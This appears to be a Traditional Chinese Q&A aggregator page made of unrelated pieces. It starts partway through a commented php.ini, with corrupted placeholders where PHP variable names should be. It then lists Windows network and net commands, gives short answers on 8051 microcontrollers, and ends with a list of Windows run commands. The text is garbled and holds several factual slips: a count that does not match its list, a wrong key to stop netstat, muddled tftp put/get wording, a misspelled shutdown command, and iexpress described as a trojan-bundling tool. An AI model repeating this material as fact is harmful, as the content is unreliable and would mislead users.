; 我們鼓勵你關閉這一選項，以保證你的腳本在將來版本的語言里仍能正常工作。

auto_globals_jit = On
; 是否僅在使用到
___FCKpd___0

SERVER和
___FCKpd___0

ENV變數時才創建(而不是在腳本一啟動時就自動創建)。
; 如果並未在腳本中使用這兩個數組，打開該指令將會獲得性能上的提升。
; 要想該指令生效，必須關閉register_globals和register_long_arrays指令。

auto_prepend_file =
auto_append_file =
; 指定在主文件之前/後自動解析的文件名。為空表示禁用該特性。
; 該文件就像調用了include()函數被包含進來一樣，因此會使用include_path指令的值。
; 注意：如果腳本通過exit()終止，那麼自動後綴將不會發生。

variables_order = "EGPCS"
; PHP注冊 Environment, GET, POST, Cookie, Server 變數的順序。
; 分別用 E, G, P, C, S 表示，按從左到右注冊，新值覆蓋舊值。
; 舉例說，設為"GP"將會導致用POST變數覆蓋同名的GET變數，
; 並完全忽略 Environment, Cookie, Server 變數。
; 推薦使用"GPC"或"GPCS"，並使用getenv()函數訪問環境變數。

register_globals = Off
; 是否將 E, G, P, C, S 變數注冊為全局變數。
; 打開該指令可能會導致嚴重的安全問題，除非你的腳本經過非常仔細的檢查。
; 推薦使用預定義的超全局變數：
___FCKpd___0

ENV,
___FCKpd___0

GET,
___FCKpd___0

POST,
___FCKpd___0

COOKIE,
___FCKpd___0

SERVER
; 該指令受variables_order指令的影響。
; PHP6中已經刪除此指令。

register_argc_argv = On
; 是否聲明$argv和$argc全局變數(包含用GET方法的信息)。
; 建議不要使用這兩個變數，並關掉該指令以提高性能。

register_long_arrays = On
; 是否啟用舊式的長式數組(HTTP_*_VARS)。
; 鼓勵使用短式的預定義超全局數組，並關閉該特性以獲得更好的性能。
; PHP6中已經刪除此指令。

always_populate_raw_post_data = Off
; 是否總是生成$HTTP_RAW_POST_DATA變數(原始POST數據)。
; 否則，此變數僅在遇到不能識別的MIME類型的數據時才產生。
; 不過，訪問原始POST數據的更好方法是 php://input 。
; $HTTP_RAW_POST_DATA對於enctype="multipart/form-data"的表單數據不可用。

unserialize_callback_func =
; 如果解序列化處理器需要實例化一個未定義的類，
; 這里指定的回調函數將以該未定義類的名字作為參數被unserialize()調用，
; 以免得到不完整的"__PHP_Incomplete_Class"對象。
; 如果這里沒有指定函數，或指定的函數不包含(或實現)那個未定義的類，將會顯示警告信息。
; 所以僅在確實需要實現這樣的回調函數時才設置該指令。
; 若要禁止這個特性，只需置空即可。

y2k_compliance = On
; 是否強制打開2000年適應(可能在非Y2K適應的瀏覽器中導致問題)。

zend.ze1_compatibility_mode = Off
; 是否使用兼容Zend引擎I(PHP 4.x)的模式。
; 這將影響對象的復制、構造(無屬性的對象會產生FALSE或0)、比較。
; 兼容模式下，對象將按值傳遞，而不是默認的按引用傳遞。

precision = 14
; 浮點型數據顯示的有效位數。

serialize_precision = 100
; 將浮點型和雙精度型數據序列化存儲時的精度(有效位數)。
; 默認值能夠確保浮點型數據被解序列化程序解碼時不會丟失數據。

[PHP-Core-OutputControl]
; 輸出控制函數很有用，特別是在已經輸出了信息之後再發送HTTP頭的情況下。
; 輸出控制函數不會作用於header()或setcookie()等函數發送的HTTP頭，
; 而只會影響類似於echo()函數輸出的信息和嵌入在PHP代碼之間的信息。

implicit_flush = Off
; 是否要求PHP輸出層在每個輸出塊之後自動刷新數據。
; 這等效於在每個 print()、echo()、HTML塊 之後自動調用flush()函數。
; 打開這個選項對程序執行的性能有嚴重的影響，通常只推薦在調試時使用。
; 在CLI SAPI的執行模式下，該指令默認為 On 。

output_buffering = 0
; 輸出緩沖區大小(位元組)。建議值為4096~8192。
; 輸出緩沖允許你甚至在輸出正文內容之後再發送HTTP頭(包括cookies)。
; 其代價是輸出層減慢一點點速度。
; 設置輸出緩沖可以減少寫入，有時還能減少網路數據包的發送。
; 這個參數的實際收益很大程度上取決於你使用的是什麼Web伺服器以及什麼樣的腳本。

output_handler =
; 將所有腳本的輸出重定向到一個輸出處理函數。
; 比如，重定向到mb_output_handler()函數時，字元編碼將被透明地轉換為指定的編碼。
; 一旦你在這里指定了輸出處理程序，輸出緩沖將被自動打開(output_buffering=4096)。
; 注意0: 此處僅能使用PHP內置的函數，自定義函數應在腳本中使用ob_start()指定。
; 注意1: 可移植腳本不能依賴該指令，而應使用ob_start()函數明確指定輸出處理函數。
; 使用這個指令可能會導致某些你不熟悉的腳本出錯。
; 注意2: 你不能同時使用"mb_output_handler"和"ob_iconv_handler"兩個輸出處理函數。
; 你也不能同時使用"ob_gzhandler"輸出處理函數和zlib.output_compression指令。
; 注意3: 如果使用zlib.output_handler指令開啟zlib輸出壓縮，該指令必須為空。

⑸ dos下常用命令有哪些主要是干什麼的啊

DOS 命令大全

Arp
顯示和修改「地址解析協議」(ARP) 所使用的到乙太網的 IP 或令牌環物理地址翻譯表。該命令只有在安裝了 TCP/IP 協議之後才可用。
arp -a [inet_addr] [-N [if_addr]
arp -d inet_addr [if_addr]
arp -s inet_addr ether_addr [if_addr]
參數
-a
通過詢問 TCP/IP 顯示當前 ARP 項。如果指定了 inet_addr，則只顯示指定計算機的 IP 和物理地址。
-g
與 -a 相同。
inet_addr
以加點的十進制標記指定 IP 地址。
-N
顯示由 if_addr 指定的網路界面 ARP 項。
if_addr
指定需要修改其地址轉換表介面的 IP 地址（如果有的話）。如果不存在，將使用第一個可適用的介面。
-d
刪除由 inet_addr 指定的項。
-s
在 ARP 緩存中添加項，將 IP 地址 inet_addr 和物理地址 ether_addr 關聯。物理地址由以連字元分隔的6 個十六進制位元組給定。使用帶點的十進制標記指定 IP 地址。項是永久性的，即在超時到期後項自動從緩存刪除。
ether_addr
指定物理地址。
Finger
在運行 Finger 服務的指定系統上顯示有關用戶的信息。根據遠程系統輸出不同的變數。該命令只有在安裝了 TCP/IP 協議之後才可用。
finger [-l] [user]@computer[...]
參數
-l
以長列表格式顯示信息。
user
指定要獲得相關信息的用戶。省略用戶參數以顯示指定計算機上所有用戶的信息：
@computer
Ftp
將文件傳送到正在運行 FTP 服務的遠程計算機或從正在運行 FTP 服務的遠程計算機傳送文件（有時稱作 daemon）。Ftp可以交互使用。單擊「相關主題」列表中的「ftp 命令」以獲得可用的「ftp」子命令描述。該命令只有在安裝了 TCP/IP 協議之後才可用。Ftp 是一種服務，一旦啟動，將創建在其中可以使用ftp 命令的子環境，通過鍵入 quit 子命令可以從子環境返回到 Windows 2000 命令提示符。當 ftp 子環境運行時，它由 ftp 命令提示符代表。
ftp [-v] [-n] [-i] [-d] [-g] [-s:filename] [-a] [-w:windowsize] [computer]
參數
-v
禁止顯示遠程伺服器響應。
-n
禁止自動登錄到初始連接。
-i
多個文件傳送時關閉交互提示。
-d
啟用調試、顯示在客戶端和伺服器之間傳遞的所有 ftp 命令。
-g
禁用文件名組，它允許在本地文件和路徑名中使用通配符字元（* 和 ?）。（請參閱聯機「命令參考」中的 glob 命令。）
-s: filename
指定包含 ftp 命令的文本文件；當 ftp 啟動後，這些命令將自動運行。該參數中不允許有空格。使用該開關而不是重定向(> )。
-a
在捆綁數據連接時使用任何本地介面。
-w:windowsize
替代默認大小為 4096 的傳送緩沖區。
computer
指定要連接到遠程計算機的計算機名或 IP 地址。如果指定，計算機必須是行的最後一個參數。
Nbtstat
該診斷命令使用 NBT（TCP/IP 上的 NetBIOS）顯示協議統計和當前 TCP/IP 連接。該命令只有在安裝了TCP/IP 協議之後才可用。
nbtstat [-a remotename] [-A IP address] [-c] [-n] [-R] [-r] [-S] [-s] [interval]
參數
-a remotename
使用遠程計算機的名稱列出其名稱表。
-A IP address
使用遠程計算機的 IP 地址並列出名稱表。
-c
給定每個名稱的 IP 地址並列出 NetBIOS 名稱緩存的內容。
-n
列出本地 NetBIOS 名稱。「已注冊」表明該名稱已被廣播 (Bnode) 或者 WINS（其他節點類型）注冊。
-R
清除 NetBIOS 名稱緩存中的所有名稱後，重新裝入 Lmhosts 文件。
-r
列出 Windows 網路名稱解析的名稱解析統計。在配置使用 WINS 的 Windows 2000 計算機上，此選項返回要通過廣播或WINS 來解析和注冊的名稱數。
-S
顯示客戶端和伺服器會話，只通過 IP 地址列出遠程計算機。
-s
顯示客戶端和伺服器會話。嘗試將遠程計算機 IP 地址轉換成使用主機文件的名稱。
interval
重新顯示選中的統計，在每個顯示之間暫停 interval 秒。按 CTRL+C 停止重新顯示統計信息。如果省略該參數，nbtstat 列印一次當前的配置信息。
Netstat
顯示協議統計和當前的 TCP/IP 網路連接。該命令只有在安裝了 TCP/IP 協議後才可以使用。
netstat [-a] [-e] [-n] [-s] [-p protocol] [-r] [interval]
參數
-a
顯示所有連接和偵聽埠。伺服器連接通常不顯示。
-e
顯示乙太網統計。該參數可以與 -s 選項結合使用。
-n
以數字格式顯示地址和埠號（而不是嘗試查找名稱）。
-s
顯示每個協議的統計。默認情況下，顯示 TCP、UDP、ICMP 和 IP 的統計。-p 選項可以用來指定默認的子集。
-p protocol
顯示由 protocol 指定的協議的連接；protocol 可以是 tcp 或 udp。如果與 -s 選項一同使用顯示每個協議的統計，protocol 可以是 tcp、udp、icmp 或 ip。
-r
顯示路由表的內容。
interval
重新顯示所選的統計，在每次顯示之間暫停 interval 秒。按 CTRL+B 停止重新顯示統計。如果省略該參數，netstat 將列印一次當前的配置信息。
Ping
驗證與遠程計算機的連接。該命令只有在安裝了 TCP/IP 協議後才可以使用。
ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [-j computer-list] | [-k computer-list] [-w timeout] destination-list
參數
-t
Ping 指定的計算機直到中斷。
-a
將地址解析為計算機名。
-n count
發送 count 指定的 ECHO 數據包數。默認值為 4。
-l length
發送包含由 length 指定的數據量的 ECHO 數據包。默認為 32 位元組；最大值是 65,527。
-f
在數據包中發送「不要分段」標志。數據包就不會被路由上的網關分段。
-i ttl
將「生存時間」欄位設置為 ttl 指定的值。
-v tos
將「服務類型」欄位設置為 tos 指定的值。
-r count
在「記錄路由」欄位中記錄傳出和返回數據包的路由。count 可以指定最少 1 台，最多 9 台計算機。
-s count
指定 count 指定的躍點數的時間戳。
-j computer-list
利用 computer-list 指定的計算機列表路由數據包。連續計算機可以被中間網關分隔（路由稀疏源）IP 允許的最大數量為9。
-k computer-list
利用 computer-list 指定的計算機列表路由數據包。連續計算機不能被中間網關分隔（路由嚴格源）IP 允許的最大數量為9。
-w timeout
指定超時間隔，單位為毫秒。
destination-list
指定要 ping 的遠程計算機。
Rcp
在 Windows 2000 計算機和運行遠程外殼埠監控程序 rshd 的系統之間復制文件。rcp 命令是一個連接命令，從Windows 2000 計算機發出該命令時，也可以用於其他傳輸在兩台運行 rshd 的計算機之間復制文件。rshd 埠監控程序可以在 UNIX 計算機上使用，而在Windows 2000 上不能使用，所以 Windows 2000 計算機僅可以作為發出命令的系統參與。遠程計算機必須也通過運行 rshd 提供 rcp 實用程序。
rcp [-a | -b] [-h] [-r] source1 source2 ... sourceN destination
參數
-a
指定 ASCII 傳輸模式。此模式在傳出文件上將回車/換行符轉換為回車符，在傳入文件中將換行符轉換為回車/換行符。該模式為默認的傳輸模式。
-b
指定二進制圖像傳輸模式。沒有執行回車/換行符轉換。
-h
傳輸 Windows 2000 計算機上標記為隱藏屬性的源文件。如果沒有該選項，在 rcp 命令行上指定隱藏文件的效果與文件不存在一樣。
-r
將源的所有子目錄內容遞歸復制到目標。source 和 destination 都必須是目錄，雖然即使源不是目錄，使用-r 也能夠工作。但將沒有遞歸。
source 和 destination
格式必須為 [computer[.user]:]filename。如果忽略了 [computer[.user]:] 部分，計算機將假定為本地計算機。如果省略了 [.user] 部分，將使用當前登錄的 Windows 2000 用戶名。如果使用了完全合格的計算機名，其中包含句點(.) 分隔符，則必須包含 [.user]。否則，計算機名的最後部分將解釋為用戶名。如果指定了多個源文件，則destination 必須是目錄。
如果文件名不是以 UNIX 的正斜杠 (/) 或 Windows 2000 系統的反斜杠 (\) 打頭，則假定相對於當前的工作目錄。在Windows 2000 中，這是發出命令的目錄。在遠程系統中，這是遠程用戶的登錄目錄。句點 (.) 表示當前的目錄。在遠程路徑中使用轉義字元（\、" 或 '），以便在遠程計算機中使用通配符。
Rexec
在運行 REXEC 服務的遠程計算機上運行命令。rexec 命令在執行指定命令前，驗證遠程計算機上的用戶名，只有安裝了TCP/IP 協議後才可以使用該命令。
rexec computer [-l username] [-n] command
參數
computer
指定要運行 command 的遠程計算機。
-l username
指定遠程計算機上的用戶名。
-n
將 rexec 的輸入重定向到 NULL。
command
指定要運行的命令。
Route
控制網路路由表。該命令只有在安裝了 TCP/IP 協議後才可以使用。
route [-f] [-p] [command [destination] [mask subnetmask] [gateway] [metric costmetric]
參數
-f
清除所有網關入口的路由表。如果該參數與某個命令組合使用，路由表將在運行命令前清除。
-p
該參數與 add 命令一起使用時，將使路由在系統引導程序之間持久存在。默認情況下，系統重新啟動時不保留路由。與 print 命令一起使用時，顯示已注冊的持久路由列表。忽略其他所有總是影響相應持久路由的命令。
command
指定下列的一個命令。
命令 目的
print 列印路由
add 添加路由
delete 刪除路由
change 更改現存路由
destination
指定發送 command 的計算機。
mask subnetmask
指定與該路由條目關聯的子網掩碼。如果沒有指定，將使用 255.255.255.255。
gateway
指定網關。
名為 Networks 的網路資料庫文件和名為 Hosts 的計算機名資料庫文件中均引用全部 destination 或 gateway 使用的符號名稱。如果命令是 print 或 delete，目標和網關還可以使用通配符，也可以省略網關參數。
metric costmetric
指派整數躍點數（從 1 到 9999）在計算最快速、最可靠和（或）最便宜的路由時使用。
Rsh
在運行 RSH 服務的遠程計算機上運行命令。該命令只有在安裝了 TCP/IP 協議後才可以使用。
rsh computer [-l username] [-n] command
參數
computer
指定運行 command 的遠程計算機。
-l username
指定遠程計算機上使用的用戶名。如果省略，則使用登錄的用戶名。
-n
將 rsh 的輸入重定向到 NULL。
command
指定要運行的命令。
Tftp
將文件傳輸到正在運行 TFTP 服務的遠程計算機或從正在運行 TFTP 服務的遠程計算機傳輸文件。該命令只有在安裝了TCP/IP 協議後才可以使用。
tftp [-i] computer [get | put] source [destination]
參數
-i
指定二進制圖像傳送模式（也稱為「八位位元組」）。在二進制圖像模式中，文件一個位元組接一個位元組地逐字移動。在傳送二進制文件時使用該模式。
如果省略了 -i，文件將以 ASCII 模式傳送。這是默認的傳送模式。此模式將 EOL 字元轉換為 UNIX 的回車符和個人計算機的回車符/換行符。在傳送文本文件時應使用此模式。如果文件傳送成功，將顯示數據傳輸率。
computer
指定本地或遠程計算機。
put
將本地計算機上的文件 destination 傳送到遠程計算機上的文件 source。
get
將遠程計算機上的文件 destination 傳送到本地計算機上的文件 source。
如果將本地計算機上的文件 file-two 傳送到遠程計算機上的文件 file-one，請指定 put。如果將遠程計算機上的文件file-two 傳送到遠程計算機上的文件 file-one，請指定 get。
因為 tftp 協議不支持用戶身份驗證，所以用戶必須登錄，並且文件在遠程計算機上必須可以寫入。
source
指定要傳送的文件。如果本地文件指定為 -，則遠程文件在 stdout 上列印出來（如果獲取），或從 stdin（如果放置）讀取。
destination
指定將文件傳送到的位置。如果省略了 destination，將假定與 source 同名。
Tracert
該診斷實用程序將包含不同生存時間 (TTL) 值的 Internet 控制消息協議 (ICMP) 回顯數據包發送到目標，以決定到達目標採用的路由。要在轉發數據包上的TTL 之前至少遞減 1，必需路徑上的每個路由器，所以 TTL 是有效的躍點計數。數據包上的 TTL 到達 0 時，路由器應該將「ICMP 已超時」的消息發送回源系統。Tracert 先發送 TTL 為 1 的回顯數據包,並在隨後的每次發送過程將 TTL 遞增 1，直到目標響應或 TTL 達到最大值，從而確定路由。路由通過檢查中級路由器發送回的「ICMP 已超時」的消息來確定路由。不過，有些路由器悄悄地下傳包含過期 TTL 值的數據包，而 tracert 看不到。
tracert [-d] [-h maximum_hops] [-j computer-list] [-w timeout]target_name
參數
/d
指定不將地址解析為計算機名。
-h maximum_hops
指定搜索目標的最大躍點數。
-j computer-list
指定沿 computer-list 的稀疏源路由。
-w timeout
每次應答等待 timeout 指定的微秒數。
target_name
目標計算機的名稱。 NET命令的基本用法
Net
以下綜合了WINDOWS 98，WINDOWS WORKSTATION和WINDOWS SERVER 三個操作系統關於NET命令的解釋，希望可以更全面一些。
先說一些：
(1)NET命令是一個命令行命令。
(2)管理網路環境、服務、用戶、登陸。。。。等本地信息
(3)WIN 98，WIN WORKSTATION和WIN NT都內置了NET命令。
(4)但WIN 98的NET命令和WORKSTATION、NT的NET命令不同。
(5)WORKSTATION和SERVER中的NET命令基本相同。
(6)獲得HELP
(1)在NT下可以用圖形的方式，開始-》幫助-》索引-》輸入NET
(2)在COMMAND下可以用字元方式，NET /?或NET或NET HELP得到一些方法 相應的方法的幫助NETCOMMAND /HELP或NET HELP COMMAND 或NET COMMAND /? 另對於錯誤NET HELPMSG MESSAGE#是4位數
(7)強制參數 所有net命令接受選項/yes和/no(可縮寫為/y和/n)。[簡單的說就是預先給系統的 提問一個答案]
(8)有一些命令是馬上產生作用並永久保存的，使用的時候要慎重
(9)對於NET命令的功能都可以找到相應的圖形工具的解決方案
(10)命令的組成 命令 參數 選項 | 參數 選項 | 參數 選項 |。。。。。。 羅里羅嗦說了一大堆，其實就是6和7有用，呵呵。另有兩件事：
(1)在NT的NET命令中有一些參數是只有在SERVER環境中才能使用的
(2)在WIN98的NET命令中有一些參數不能在DOS-WIN中使用，只能在DOS環境中使用
下面對NET命令的不同參數的基本用法做一些初步的介紹：
一、NET VIEW
作 用：顯示域列表、計算機列表或指定計算機的共享資源列表。
命令格式：net view [\\computername | /domain[:domainname]
參數介紹：
(1)鍵入不帶參數的net view顯示當前域的計算機列表。
(2)\\computername 指定要查看其共享資源的計算機。
(3)/domain[:domainname]指定要查看其可用計算機的域。
簡單事例：
(1)net view \\YFANG查看YFANG的共享資源列表。
(2)net view /domain:LOVE查看LOVE域中的機器列表。
二、NET USER
作 用：添加或更改用戶帳號或顯示用戶帳號信息。該命令也可以寫為 net users。
命令格式：net user [username [password | *] [options] [/domain]
參數介紹：
(1)鍵入不帶參數的net user查看計算機上的用戶帳號列表。
(2)username添加、刪除、更改或查看用戶帳號名。
(3)password為用戶帳號分配或更改密碼。
(4)*提示輸入密碼。
(5)/domain在計算機主域的主域控制器中執行操作。
簡單事例：
(1)net user yfang查看用戶YFANG的信息
三、NET USE
作 用：連接計算機或斷開計算機與共享資源的連接，或顯示計算機的連接信息。
命令格式：net use [devicename | *] [\\computername\sharename[\volume] [password | *] [/user:[domainname\]username] [/delete] | [/persistent:{yes | no]}
參數介紹：
鍵入不帶參數的net use列出網路連接。
devicename指定要連接到的資源名稱或要斷開的設備名稱。
\\computername\sharename伺服器及共享資源的名稱。
password訪問共享資源的密碼。
*提示鍵入密碼。
/user指定進行連接的另外一個用戶。
domainname指定另一個域。
username指定登錄的用戶名。
/home將用戶連接到其宿主目錄。
/delete取消指定網路連接。
/persistent控制永久網路連接的使用。
簡單事例：
(1)net use e: \\YFANG\TEMP將\\YFANG\TEMP目錄建立為E盤
(2)net use e: \\YFANG\TEMP /delete斷開連接
四、NET TIME
作 用：使計算機的時鍾與另一台計算機或域的時間同步。
命令格式：net time [\\computername | /domain[:name] [/set]
參數介紹：
(1)\\computername要檢查或同步的伺服器名。
(2)/domain[:name]指定要與其時間同步的域。
(3)/set使本計算機時鍾與指定計算機或域的時鍾同步。
下面的這4個參數是相關的，所以一起介紹
五、Net Start
作 用：啟動服務，或顯示已啟動服務的列表。
命令格式：net start service
六、Net Pause
作 用：暫停正在運行的服務。
命令格式：net pause service
七、Net Continue
作 用：重新激活掛起的服務。
命令格式：net continue service
八、NET STOP
作 用：停止 Windows NT 網路服務。
命令格式：net stop service
參數介紹：我們來看看這些服務都是什麼
(1)alerter(警報)
(2)client service for netware(Netware 客戶端服務)
(3)clipbook server(剪貼簿伺服器)
(4)computer browser(計算機瀏覽器)
(5)directory replicator(目錄復制器)
(6)ftp publishing service (ftp )(ftp 發行服務)
(7)lpdsvc
(8)net logon(網路登錄)
(9)network dde(網路 dde)
(10)network dde dsdm(網路 dde dsdm)
(11)network monitor agent(網路監控代理)
(12)nt lm security support provider(NT LM 安全性支持提供)
(13)ole(對象鏈接與嵌入)
(14)remote access connection manager(遠程訪問連接管理器)
(15)remote access isnsap service(遠程訪問 isnsap 服務)
(16)remote access server(遠程訪問伺服器)
(17)remote procere call (rpc) locator(遠程過程調用定位器)
(18)remote procere call (rpc) service(遠程過程調用服務)
(19)schele(調度)
(20)server(伺服器)
(21)simple tcp/ip services(簡單 TCP/IP 服務)
(22)snmp
(23)spooler(後台列印程序)
(24)tcp/ip netbios helper(TCP/IP NETBIOS 輔助工具)
(25)ups
(26)workstation(工作站)
(27)messenger(信使)
(28)dhcp client
(29)eventlog 以下這些SERVICE只能在NT SERVER上使用
(1)file server for macintosh
(2)gateway service for netware
(3)microsoft dhcp server
(4)print server for macintosh
(5)remoteboot
(6)windows internet name service
九、Net Statistics
作 用：顯示本地工作站或伺服器服務的統計記錄。
命令格式：net statistics [workstation | server]
參數介紹：
(1)鍵入不帶參數的net statistics列出其統計信息可用的運行服務。
(2)workstation顯示本地工作站服務的統計信息。
(3)server顯示本地伺服器服務的統計信息。
簡單事例：
(1)net statistics server | more顯示伺服器服務的統計信息
十、Net Share
作 用：創建、刪除或顯示共享資源。
命令格式：net share sharename=drive:path [/users:number | /unlimited] [/remark:"text"]
參數介紹：
(1)鍵入不帶參數的net share顯示本地計算機上所有共享資源的信息。
(2)sharename是共享資源的網路名稱。
(3)drive:path指定共享目錄的絕對路徑。
(4)/users:number設置可同時訪問共享資源的最大用戶數。
(5)/unlimited不限制同時訪問共享資源的用戶數。
(6)/remark:"text "添加關於資源的注釋，注釋文字用引號引住。
簡單事例：
(1)net share mylove=c:\temp /remark:"my first share"以mylove為共享名共享C:\temp
(2)net share mylove /delete停止共享mylove目錄

十一、Net Session
作 用：列出或斷開本地計算機和與之連接的客戶端的會話，也可以寫為net sessions或net sess。
命令格式：net session [\\computername] [/delete]
參數介紹：
(1)鍵入不帶參數的net session顯示所有與本地計算機的會話的信息。
(2)\\computername標識要列出或斷開會話的計算機。
(3)/delete結束與\\computername計算機會話並關閉本次會話期間計算機的所有.
簡單事例：
(1)net session \\YFANG要顯示計算機名為YFANG的客戶端會話信息列表。
十二、Net Send
作 用：向網路的其他用戶、計算機或通信名發送消息。
命令格式：net send {name | * | /domain[:name] | /users} message
參數介紹：
(1)name要接收發送消息的用戶名、計算機名或通信名。
(2)*將消息發送到組中所有名稱。
(3)/domain[:name]將消息發送到計算機域中的所有名稱。
(4)/users將消息發送到與伺服器連接的所有用戶。
(5)message作為消息發送的文本。
簡單事例：
(1)net send /users server will shutdown in 5 minutes.給所有連接到伺服器的用戶發送消息
十三、Net Print
作 用：顯示或控制列印作業及列印隊列。
命令格式：net print [\\computername ] job# [/hold | /release | /delete]
參數介紹：
(1)computername共享列印機隊列的計算機名。
(2)sharename列印隊列名稱。
(3)job#在列印機隊列中分配給列印作業的標識號。
(4)/hold使用 job# 時，在列印機隊列中使列印作業等待。
(5)/release釋放保留的列印作業。
(6)/delete從列印機隊列中刪除列印作業。
簡單事例：
(1)net print \\YFANG\SEEME列出\\YFANG計算機上SEEME列印機隊列的目錄
十四、Net Name
作 用：添加或刪除消息名（有時也稱別名），或顯示計算機接收消息的名稱列表。
命令格式：net name [name [/add | /delete]
參數介紹：
(1)鍵入不帶參數的net name列出當前使用的名稱。
(2)name指定接收消息的名稱。
(3)/add將名稱添加到計算機中。
(4)/delete從計算機中刪除名稱。
十五、Net Localgroup
作 用：添加、顯示或更改本地組。
命令格式：net localgroup groupname {/add [/comment:"text "] | /delete} [/domain]
參數介紹：
(1)鍵入不帶參數的net localgroup顯示伺服器名稱和計算機的本地組名稱。
(2)groupname要添加、擴充或刪除的本地組名稱。
(3)/comment: "text "為新建或現有組添加註釋。
(4)/domain在當前域的主域控制器中執行操作，否則僅在本地計算機上執行操作?
(5)name [ ...]列出要添加到本地組或從本地組中刪除的一個或多個用戶名或組名。
(6)/add將全局組名或用戶名添加到本地組中。
(7)/delete從本地組中刪除組名或用戶名。
簡單事例：
(1)net localgroup love /add將名為love的本地組添加到本地用戶帳號資料庫
(

⑹ 單片機簡答題

1.高級語言，匯編語言，機器語言
2.0000h是PC復位後地址，後面三個分別是外部中斷0，定時器中斷0，外部中斷1，定時器中斷1，串列口中斷的入口地址
3。是允許訪問外部存儲器控制線，低電平有效，使用8031時，因為8031無內部程序存儲器所以必須接地允許使用外部存儲。
4。有兩個優先順序分別為0和1，通過優先順序寄存器IP來設定，欲設定某個中斷為高優先順序則將寄存器中相應的位置1。
5.工作寄存器區，分為4組通用寄存器，每組又分為R0~R7，可通過程序狀態字的PSW4和PSW3來選定使用哪一組；位定址區，可位定址也可位元組定址；數據緩沖區堆棧區，可設置堆棧起始區。
6.不相同，第一個是將累加器中內容送片內寄存器Ri中，第二個是將累加器內容送片外寄存器Ri中。
打得好累，希望對你有幫助。。。

⑺ 電腦系統知識

cmd命令
路由
tsadmin.exe Administrator 終端服務管理器 (XP不可用)
tscon.exe 粘貼用戶會話到終端對話
tsdiscon.exe 斷開終端服務的用戶
tskill.exe 殺掉終端服務
tsprof.exe 用終端服務得出查詢結果
tsshutdn.exe 關閉系統
unlodctr.exe 性能監視器的一部分
upg351db.exe 升級Jet資料庫 (XP不可用)
ups.exe UPS service UPS服務
user.exe Windows核心服務
userinit.exe 打開我的文檔
usrmgr.exe 域用戶管理器
utilman.exe 指定2000啟動時自動打開那台機器
vwipxspx.exe 調用IPX/SPX VDM
w32tm.exe 時間伺服器
wextract.exe 解壓縮Windows文件
winchat.exe 打開Windows聊天工具
winhlp32.exe 運行幫助系統
winmsd.exe 查看系統信息
winver.exe 顯示Windows版本
wizmgr.exe Windows管理向導 (XP不可用)
wjview.exe Java 命令行調用Java
write.exe 打開寫字板
wscript.exe 腳本工具
wupdmgr.exe Windows update 運行Windows update升級向導
winver 檢查Windows版本
Win98系統工具
開始,運行,輸入Msconfig 系統配置實用工具配置啟動選項，包括config.sys、autoexec.bat、win.ini、system.ini和注冊表及程序菜單中的
wmimgmt.msc 打開Windows管理體系結構(wmi)
wupdmgr Windows更新程序
wscript Windows腳本宿主設置
write 寫字板
winmsd 系統信息
wiaacmgr 掃描儀和照相機向導
winchat xp自帶區域網聊天
mem.exe 顯示內存使用情況
msconfig.exe 系統配置實用程序
mplayer2 簡易widnows media player
mspaint 畫圖板
mstsc 遠程桌面連接
mplayer2 媒體播放機
magnify 放大鏡實用程序
mmc 打開控制台
mobsync 同步命令
dxdiag 檢查directx信息
drwtsn32 系統醫生
devmgmt.msc 設備管理器
dfrg.msc 磁碟碎片整理程序
diskmgmt.msc 磁碟管理實用程序
dcomcnfg 打開系統組件服務
ddeshare 打開dde共享設置
dvdplay dvd播放器
net stop messenger 停止信使服務
net start messenger 開始信使服務
notepad 打開記事本
nslookup 網路管理的工具向導
ntbackup 系統備份和還原
narrator 屏幕「講述人」
ntmsmgr.msc 移動存儲管理器
ntmsoprq.msc 移動存儲管理員操作請求
netstat -an （tc）命令檢查介面
syncapp 創建一個公文包
sysedit 系統配置編輯器
sigverif 文件簽名驗證程序
sndrec32 錄音機
shrpubw 創建共享文件夾
secpol.msc 本地安全策略
syskey 系統加密，一旦加密就不能解開，保護Windows xp系統的雙重密碼
services.msc 本地服務設置
sndvol32 音量控製程序
sfc.exe 系統文件檢查器
sfc /scannow windows文件保護 tsshutdn 60秒倒計時關機命令
tourstart xp簡介（安裝完成後出現的漫遊xp程序）
taskmgr 任務管理器
eventvwr 事件查看器
eudcedit 造字程序
explorer 打開資源管理器
packager 對象包裝程序
perfmon.msc 計算機性能監測程序
progman 程序管理器
regedit.exe 注冊表
rsop.msc 組策略結果集
regedt32 注冊表編輯器
rononce -p 15秒關機
regsvr32 /u *.dll 停止dll文件運行
regsvr32 /u zipfldr.dll 取消zip支持
cmd.exe cmd命令提示符
chkdsk.exe chkdsk磁碟檢查
certmgr.msc 證書管理實用程序
calc 啟動計算器
charmap 啟動字元映射表
cliconfg sql server 客戶端網路實用程序
clipbrd 剪貼板查看器
conf 啟動netmeeting
compmgmt.msc 計算機管理
cleanmgr 垃圾整理
ciadv.msc 索引服務程序
osk 打開屏幕鍵盤
odbcad32 odbc數據源管理器
oobe/msoobe /a 檢查xp是否激活
lusrmgr.msc 本機用戶和組
logoff 注銷命令
iexpress 木馬捆綁工具，系統自帶
nslookup ip地址偵測器
fsmgmt.msc 共享文件夾管理器
utilman 輔助工具管理器
gpedit.msc 組策略
以下為Windows操作系統的常用運行命令,執行這些命令,就能打開系統對應的相關實用程序,如果大家能基本利用,就能檢查並修復系統的最基本
的故障,除注銷,關閉系統命令外,其它所有命令,大家不妨一試!!
運行\輸入CMD\輸入 對應的相關實用程序:
. 打開C:＼Documents and Settings＼XXX(當前登錄Windows XP的用戶名)
.. 打開Windows XP所在的盤符下的Documents and Settings文件夾
... 打開「我的電腦」選項。
accwiz.exe 輔助工具向導
actmovie.exe 直接顯示安裝工具
append.exe 允許程序打開制定目錄中的數據
arp.exe 顯示和更改計算機的IP與硬體物理地址的對應列表
at.exe 計劃運行任務
atmadm.exe ATM調用管理器統計
attrib.exe 顯示和更改文件和文件夾屬性
autochk.exe 檢測修復文件系統 (XP不可用)
autoconv.exe 在啟動過程中自動轉化系統 (XP不可用)
autofmt.exe 在啟動過程中格式化進程 (XP不可用)
autolfn.exe 使用長文件名格式 (XP不可用)
arp.exe 顯示和更改計算機的IP與硬體物理地址的對應
calc.exe 計算器
Bootvrfy.exe 通報啟動成功
cacls.exe 顯示和編輯ACL
cdplayer.exe CD播放器
change.exe 與終端伺服器相關的查詢 (XP不可用)
charmap.exe 字元映射表
chglogon.exe 啟動或停用會話記錄 (XP不可用)
chgport.exe 改變埠（終端服務） (XP不可用)
